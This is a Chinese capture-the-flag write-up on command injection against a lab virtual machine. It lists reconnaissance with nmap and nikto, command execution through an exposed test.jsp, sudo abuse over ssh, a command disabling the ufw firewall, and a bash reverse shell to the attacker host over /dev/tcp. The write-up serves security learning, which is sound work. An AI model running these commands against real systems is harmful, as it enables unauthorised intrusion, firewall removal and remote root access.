微信公众号搜"智元新知"关注
微信扫一扫可直接关注哦!

CTF-命令执行【超详细】

前言

作者简介:不知名白帽,网络安全学习者。

博客主页:https://blog.csdn.net/m0_63127854?type=blog

CTF-专栏:https://blog.csdn.net/m0_63127854/category_11835386.html

网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan

目录

命令执行漏洞介绍

实验环境

信息探测

nmap -sV 192.168.20.136

访问192.168.20.136:8080

敏感信息探测

进行系统命令执行

列出/tmp目录下的文件

列出/home目录下的内容

读取敏感信息

漏洞利用

利用ssh协议执行root权限的命令

关闭Ubuntu中的防火墙

提权

监听端口

靶机反弹shell

查看flag


命令执行漏洞介绍

当应用需要调用一些外部应用程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system、exec、shell_exec等,当用户可以控制命令执行函数中的参数时,将可以注入恶意命令到正常命令中,造成命令执行攻击。

调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,有没有多虑用户输入的情况下,就会造成命令执行漏洞。

实验环境

kali 192.168.20.128

靶机 192.168.20.136

链接:https://pan.baidu.com/s/1OgpClNu8ggDEc_DBTRD57Q

提取码:t1x0

信息探测

nmap -sV 192.168.20.136

访问192.168.20.136:8080

发现敏感信息

敏感信息探测

nikto -host http://192.168.20.136:8080

发现/test.jsp并进行访问

进行系统命令执行

列出/tmp目录下的文件

列出/home目录下的内容

读取敏感信息

漏洞利用

利用ssh协议执行root权限的命令

ssh bill@localhost sudo -l

关闭Ubuntu中的防火墙

ssh bill@localhost sudo ufw disable

提权

监听端口

靶机反弹shell

ssh bill@localhost sudo bash -i >& /dev/tcp/192.168.20.128/4444 0>&1

查看flag

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。

相关推荐